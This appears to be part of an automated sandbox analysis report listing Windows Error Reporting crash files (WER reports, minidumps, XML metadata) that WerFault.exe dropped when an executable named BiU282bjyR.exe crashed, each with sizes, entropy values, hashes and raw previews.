                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.7.9.7.1.0.2.4.0.5.7.0.9.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.9.d.c.5.7.1.d.-.1.9.6.0.-.4.d.a.3.-.a.1.7.c.-.7.7.7.2.b.b.e.d.5.6.3.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.9.3.a.2.0.0.1.-.b.e.5.9.-.4.0.6.c.-.b.9.c.6.-.b.3.7.1.8.d.5.b.5.4.2.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.i.U.2.8.2.b.j.y.R...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.7.z...e.x.e.*.....P.r.o.d.u.c.t.N.a.m.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.4.-.0.0.0.1.-.0.0.2.7.-.c.8.8.3.-.2.d.c.6.2.3.d.c.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.f.4.c.7.e.7.3.6.0.7.1.3.7.f.8.b.2.d.e.9.a.3.5.1.7.b.9.7.3.b.0.0.0.0.0.9.0.4.!.0.0.0.0.2.4.c.5.d.3.1.5.9.a.f.9.d.9.9.2.a.0.a.2.6.3.6.8.c.f.6.5.b.a.3.1.3.f.3.e.8.b.e.4.!.B.i.U.2.8.2.b.j.y.R...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.5./.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9664404178141631
                  Encrypted:false
                  SSDEEP:96:hVHn3KFQQ2oA7Jf6TpXIQcQnc6rCcEhcw3rr+HbHg/8BRTf3jFa9iVfNsGIMbJ3w:76tH56rAjljA4dKq/u7sUS274ItZ
                  MD5:AC4C69FB07726DBF9B22B66BFD6ED7EE
                  SHA1:C29089613EA0F99933A6CF1F429611F44E8A00D8
                  SHA-256:E2CE24CE52526293FC35233AB2689E6AF7A57EF6EE3E5C1772D2C95D54FB1EFB
                  SHA-512:4F19D9C17C915DC9612B97388A26B2CB6231ECA07DB9621ED136F0D6ACFBDE8CECD487DBAD15832C9FB51863A5D617C992882E67ECE9FF3BE92A0E6050FF918B
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.7.9.7.1.0.2.0.7.3.0.4.5.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.d.b.5.d.d.b.8.-.c.6.2.f.-.4.9.5.d.-.8.d.3.1.-.8.a.2.7.b.9.a.6.6.0.c.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.3.a.b.1.4.9.-.0.c.e.7.-.4.0.5.1.-.9.a.b.6.-.9.8.f.9.1.9.f.d.0.5.5.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.i.U.2.8.2.b.j.y.R...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.7.z...e.x.e.*.....P.r.o.d.u.c.t.N.a.m.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.4.-.0.0.0.1.-.0.0.2.7.-.c.8.8.3.-.2.d.c.6.2.3.d.c.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.f.4.c.7.e.7.3.6.0.7.1.3.7.f.8.b.2.d.e.9.a.3.5.1.7.b.9.7.3.b.0.0.0.0.0.9.0.4.!.0.0.0.0.2.4.c.5.d.3.1.5.9.a.f.9.d.9.9.2.a.0.a.2.6.3.6.8.c.f.6.5.b.a.3.1.3.f.3.e.8.b.e.4.!.B.i.U.2.8.2.b.j.y.R...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.5./.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9728387864880165
                  Encrypted:false
                  SSDEEP:96:Idu3KFQQ2oA7Jf6TpXIQcQnc6rCcEhcw3rr+HbHg/8BRTf3jFa9iVfNsGIMbJ3VZ:qu6tH56rAjljA4dK+/u7sUS274ItZa
                  MD5:BD194BC6F1F941D084EFC749FC030866
                  SHA1:75778A1ACDB7290C54D34E985933FD61D4721D3E
                  SHA-256:4058CC0A2F53174C4E17D5D9353A9E81E26BA176FED85E4E2ACFAA573F9E169C
                  SHA-512:7E5C94F2E3C3E931B0FF298E995F6386C32BCFF2D0104DD3C1F2D52FB06EB14148E71B1B34AEE95AD9F0063BD16A754235F9C8B3BC6598E5A4CBE52102B7E7B4
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.7.9.7.1.0.2.1.9.7.4.7.6.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.1.3.e.a.f.3.-.8.9.c.8.-.4.d.4.d.-.9.9.b.6.-.f.0.d.3.4.b.3.5.5.6.8.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.e.6.a.2.a.9.-.e.5.8.f.-.4.e.6.d.-.9.d.c.0.-.0.b.d.9.9.c.f.1.2.d.3.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.i.U.2.8.2.b.j.y.R...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.7.z...e.x.e.*.....P.r.o.d.u.c.t.N.a.m.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.4.-.0.0.0.1.-.0.0.2.7.-.c.8.8.3.-.2.d.c.6.2.3.d.c.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.f.4.c.7.e.7.3.6.0.7.1.3.7.f.8.b.2.d.e.9.a.3.5.1.7.b.9.7.3.b.0.0.0.0.0.9.0.4.!.0.0.0.0.2.4.c.5.d.3.1.5.9.a.f.9.d.9.9.2.a.0.a.2.6.3.6.8.c.f.6.5.b.a.3.1.3.f.3.e.8.b.e.4.!.B.i.U.2.8.2.b.j.y.R...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.5./.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9728844622931021
                  Encrypted:false
                  SSDEEP:96:xiHTU3KvQQ2oA7Jf6TpXIQcQnc6rCcEhcw3rr+HbHg/8BRTf3jFa9iVfNsGIMbJ0:yTU6HH56rAjljA4dK+/u7sUS274ItZ
                  MD5:089D47D01F594DE3DC663C5890A10D3A
                  SHA1:349B5411DED45DCCB6DDE457DFB0DA3BC21627E6
                  SHA-256:9532EE809957CE5FF9D73D8AA2A22CEB03A265A2A8D9A28A345D771CC7501994
                  SHA-512:E4817974A40AA86BFA795931759A8675C68DB1676335F51C2DE3667A30A2B7362C80158E05D1BA82006CF151ADA27EA72382D2D011CC43E7ABA00E1424D94164
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.7.9.7.1.0.2.3.0.5.4.9.0.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.9.b.9.0.8.c.-.f.3.2.4.-.4.0.1.e.-.9.d.4.6.-.7.8.6.9.4.9.0.c.5.8.7.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.b.8.9.e.f.2.-.d.1.7.3.-.4.9.7.e.-.a.9.a.1.-.9.4.e.5.c.6.a.b.a.8.a.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.i.U.2.8.2.b.j.y.R...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.7.z...e.x.e.*.....P.r.o.d.u.c.t.N.a.m.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.4.-.0.0.0.1.-.0.0.2.7.-.c.8.8.3.-.2.d.c.6.2.3.d.c.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.f.4.c.7.e.7.3.6.0.7.1.3.7.f.8.b.2.d.e.9.a.3.5.1.7.b.9.7.3.b.0.0.0.0.0.9.0.4.!.0.0.0.0.2.4.c.5.d.3.1.5.9.a.f.9.d.9.9.2.a.0.a.2.6.3.6.8.c.f.6.5.b.a.3.1.3.f.3.e.8.b.e.4.!.B.i.U.2.8.2.b.j.y.R...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.5./.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):1.0409955897368826
                  Encrypted:false
                  SSDEEP:96:NO3KqQQ2oA7Jf6TpXIQcQnc6rCcEhcw3rr+HbHg/8BRTf3jFa9iVfNsGIMbJ3Vi/:w6iH56rAjljA4dKwf/u7sUS274ItZ
                  MD5:8B3E63B0D754DFD59623E286CD3F5D30
                  SHA1:38B746AD22715F13451C4F2B59B1308C36072F49
                  SHA-256:2C2127E731C22BD32609DC0B89AE1B1356B0B252DA250934A52426F5BCEFCBBD
                  SHA-512:53BFD169F14C4F35F18F63279D9286FED8B452D9E3F81B3AD38DF64C5BA7323B20D6F92D46FC8FF2024685FB0130A0ACFD5FE5A6C67A03063607C9509D06DA39
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.7.9.7.1.0.3.7.2.4.2.5.9.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.b.6.a.6.9.3.-.f.f.e.9.-.4.b.8.b.-.9.6.d.e.-.1.d.f.7.d.6.0.7.1.4.f.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.0.0.0.8.8.f.-.6.b.c.1.-.4.8.4.6.-.8.3.f.5.-.6.7.b.1.2.0.4.e.d.4.c.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.i.U.2.8.2.b.j.y.R...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.7.z...e.x.e.*.....P.r.o.d.u.c.t.N.a.m.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.4.-.0.0.0.1.-.0.0.2.7.-.c.8.8.3.-.2.d.c.6.2.3.d.c.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.f.4.c.7.e.7.3.6.0.7.1.3.7.f.8.b.2.d.e.9.a.3.5.1.7.b.9.7.3.b.0.0.0.0.0.9.0.4.!.0.0.0.0.2.4.c.5.d.3.1.5.9.a.f.9.d.9.9.2.a.0.a.2.6.3.6.8.c.f.6.5.b.a.3.1.3.f.3.e.8.b.e.4.!.B.i.U.2.8.2.b.j.y.R...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.5./.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9982143020900487
                  Encrypted:false
                  SSDEEP:96:7Wykj3KoQQ2oA7Jf6TpXIQcQnc6rCcEhcw3rr+HbHg/8BRTf3jFa9iVfNsGIMbJK:Y6AH56rAjljA4dKwt/u7sUS274ItZ
                  MD5:FC64834B007D2F3D129E1223B1604F45
                  SHA1:639C21B2C0E0465D4D2F4291FB25D7EF2607D7CC
                  SHA-256:E9519C850A6A9811E01C90A0B8DCF8A841AB136757CEC1CA19E75FAE2F222CC5
                  SHA-512:043FD52B2079DD6FACC9A167B72B45B3A758F6617F10D0E3782C196412E418535796248212DC788A85FEB16A71B2D88E3401660A61E4569666DE8040EE2562FD
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.7.9.7.1.0.2.8.1.4.2.2.1.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.c.2.8.4.f.c.-.0.f.0.8.-.4.5.2.3.-.b.6.2.2.-.7.8.b.c.4.4.4.d.2.8.a.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.f.6.a.5.d.d.f.-.b.8.0.d.-.4.3.3.6.-.b.8.2.6.-.2.5.3.9.5.3.c.2.d.c.9.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.i.U.2.8.2.b.j.y.R...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.7.z...e.x.e.*.....P.r.o.d.u.c.t.N.a.m.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.4.-.0.0.0.1.-.0.0.2.7.-.c.8.8.3.-.2.d.c.6.2.3.d.c.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.f.4.c.7.e.7.3.6.0.7.1.3.7.f.8.b.2.d.e.9.a.3.5.1.7.b.9.7.3.b.0.0.0.0.0.9.0.4.!.0.0.0.0.2.4.c.5.d.3.1.5.9.a.f.9.d.9.9.2.a.0.a.2.6.3.6.8.c.f.6.5.b.a.3.1.3.f.3.e.8.b.e.4.!.B.i.U.2.8.2.b.j.y.R...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.5./.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Thu Aug 31 15:57:47 2023, 0x1205a4 type
                  Category:dropped
                  Size (bytes):114020
                  Entropy (8bit):1.9183136063528408
                  Encrypted:false
                  SSDEEP:384:0B+8UWCePq59hH9vGhIDOGViiLN7TAn9IoURAOdq:XePq59xlGaLNuIoUOc
                  MD5:B4F1B6F0C7E7915820A33CA1FA2E1414
                  SHA1:ECB5C10A236CC5CF18A02BB00BCDF46FB059EC21
                  SHA-256:23059374B5C0D13E9F4DCDC5653564D9071A9E38510F436C5FE64C32734A03AD
                  SHA-512:30B03CC4BBCFB20ADAEFD8506E4115C5ACC0A4049963D3E0A9463278A3C4203FD82031FDEF128B609DEF59EC851E3AE3C7FE139C7CD7E951FBFA2E9B82487F66
                  Malicious:false
                  Preview:MDMP....... .......{..d............t.......................$...p"..........HS..........`.......8...........T...........p6.............."...........$...................................................................U...........B.......%......GenuineIntelW...........T...........K..d.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8346
                  Entropy (8bit):3.7045276474387876
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNiqx6p16YyTSU6Tt0gmf/S8+pBT89bennsf+Km:RrlsNiE6r6YWSU6Tegmf/SmensfK
                  MD5:9435851457F547009EC15521226D4407
                  SHA1:2FBC4564F49BE002605D68E3A2C3D82DEC5B135A
                  SHA-256:4C339C7F9C9595231FA40033A66DF06F694A7D62B1FEDDDBC4822EB1742FAFB1
                  SHA-512:20CDADC3E65DE07FAFB474C7791914BC33B0ACE1AF41A5996FC286DE8F8EB4A60A84C75D82B11539B86CB8450F5B097E9038403CFC3F546A7E3C6E0F133B87E8
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.6.<./.P.i.d.>.......
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Thu Aug 31 15:57:01 2023, 0x1205a4 type
                  Category:dropped
                  Size (bytes):78368
                  Entropy (8bit):1.9828529422283836
                  Encrypted:false
                  SSDEEP:192:BOd9PYQN/E8J8Oexz608K/yxX32R4LOP2dUfnkIJSXcXPXJxajoIKPaExK2PTIsQ:4RE8Jzeb83M5wJVZ6LlCUBGkRlWj
                  MD5:A65B1CD605FAC6EAA5C43E4F4319D920
                  SHA1:ECA3788CF2D89984803060F83DBE632E3D9B681B
                  SHA-256:E46B85CF2E017EF8080955A288C493B56968277EDCA6960BFF6C3A5D659319FF
                  SHA-512:68600DF8F8FE57E791D009140B4CBADC5612CF5C634BFBA6D2B1D5B8C2B1495568F906CF783D6100A161A961824A09E000C87EF2F189B19EC320E105DE6A3FCD
                  Malicious:false
                  Preview:MDMP....... .......M..d........................D...........$...........t...h>..........`.......8...........T...........X!...............................................................................................U...........B..............GenuineIntelW...........T...........K..d.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.70644284584113
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNiqu6Ch6YybSUfmhEgmf/S8+pBO89bMnnsfpEm:RrlsNiz6k6Y+SUfeEgmf/SlMnsf/
                  MD5:8B1C6CC74C3A1C74358B57053707AEAB
                  SHA1:6E5353EF8063B271C85AC7AD1652613B200DDDB2
                  SHA-256:D8948CD3A7CCD30899443A4C330E76DBCF962A9CBB44E536CEAC3B78A587984B
                  SHA-512:A0F512E139B775C368FB917312C340C9D94573D9C08742207B776D51248F8037C48ED58F395B3F500786BECC553799D07ECCEA635B351DD132E4EC5C7BADB1FE
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.6.<./.P.i.d.>.......
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Thu Aug 31 15:57:02 2023, 0x1205a4 type
                  Category:dropped
                  Size (bytes):88618
                  Entropy (8bit):1.891544517065939
                  Encrypted:false
                  SSDEEP:192:yL+kAc4APJTMDAOexzFyJDQK/yxXePhw0x8/XU732R4LOP2dUfnkIJSXcXPXJxa8:eJTMDXejoCQwnNTcViSLN38ckwOk
                  MD5:6701F8758CEAEC799499D42BB9D868E7
                  SHA1:06BB7809849175F697652F315023EA097C5E5975
                  SHA-256:197180ADE423E427A504DD42978427458E5985C816415B51C3CE452C2E1855A7
                  SHA-512:A162E81AF5EAF65B82BF44DD5520F09A2F889ACEA7969D24AE36DC7377C8E6C72A2D6BF6A491C6662C0758535C4AB6B20AA7BF35E0759C640F4E2D13A830DF79
                  Malicious:false
                  Preview:MDMP....... .......N..d....................................$................D..........`.......8...........T............"...7...........................................................................................U...........B......P ......GenuineIntelW...........T...........K..d.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.7044137630669476
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNiqf6m6YygSUfmhEgmf/S8+pBM89bHnnsf0Jtm:RrlsNii6m6Y1SUfeEgmf/SbHnsf3
                  MD5:2205EFD18C6B815A183ED8DDBD59D895
                  SHA1:F811469D52F016B7D0E315E08A8C0EDAAC4418F2
                  SHA-256:0211DBE0FAD2D72DD6B83A6C8462C3CB55216B4BBDD0070478FE493A6D8609BC
                  SHA-512:BE73556031E89C91DBFDB0C6145AA020CA7C9ACCC06945B7B0CCC5E4058573ADD98F69361055EA5F29ADF6B0D82DA234A4C2D13620DC5608B80837B07C3CD745
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.6.<./.P.i.d.>.......
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Thu Aug 31 15:57:03 2023, 0x1205a4 type
                  Category:dropped
                  Size (bytes):87778
                  Entropy (8bit):1.9084216852620846
                  Encrypted:false
                  SSDEEP:192:PGPc4APJTMNsBoOexzFxxK/yxXePhw0x8/XU732R4LOP2dUfnkIJSXcXPXJxajou:hJTMSBvejoILFT7OyNOViSLNSTvYse0i
                  MD5:354372549D67CB104430BEC511DD4A4A
                  SHA1:3E49B7B1F8E8F89E8843F0B919A31FD99CA4FFEC
                  SHA-256:66BAA6AFA670F802BBCA5F030D8689CB319669376243593B7445218F8C90FB87
                  SHA-512:FFF438B769BD2DEDBEC30545B6DA0334C5A362ECEFC04FE70C960645DA24E825B513468F861FAA8C053CEDF39223741CF04C5B8FCEF48E96425035D8C8249F77
                  Malicious:false
                  Preview:MDMP....... .......O..d....................................$................D..........`.......8...........T............"..J4...........................................................................................U...........B......P ......GenuineIntelW...........T...........K..d.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.705346833284827
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNiqf6kI6Yy0SUfmhEgmf/S8+pBT89b+nnsfbjqm:RrlsNiC6kI6YBSUfeEgmf/Sm+nsfbv
                  MD5:EFE05B527247E94C1E760F28F226B712
                  SHA1:4796A2688E6ED5ED88076330FAD00E10DC2BCDA8
                  SHA-256:2873C1106130C7E304069F013D6B91B5EE7F4DB686B0B3147D8915294000DDD9
                  SHA-512:089D9F316A139C8311249AF81DF9F2E529DA61EAE15B13AD28B30BFB7E98D52FD4393220CB3C05C9B5C59B2FAB7E59A1AC02C4EF7F5129EEED68C403E52B8647
                  Malicious:false
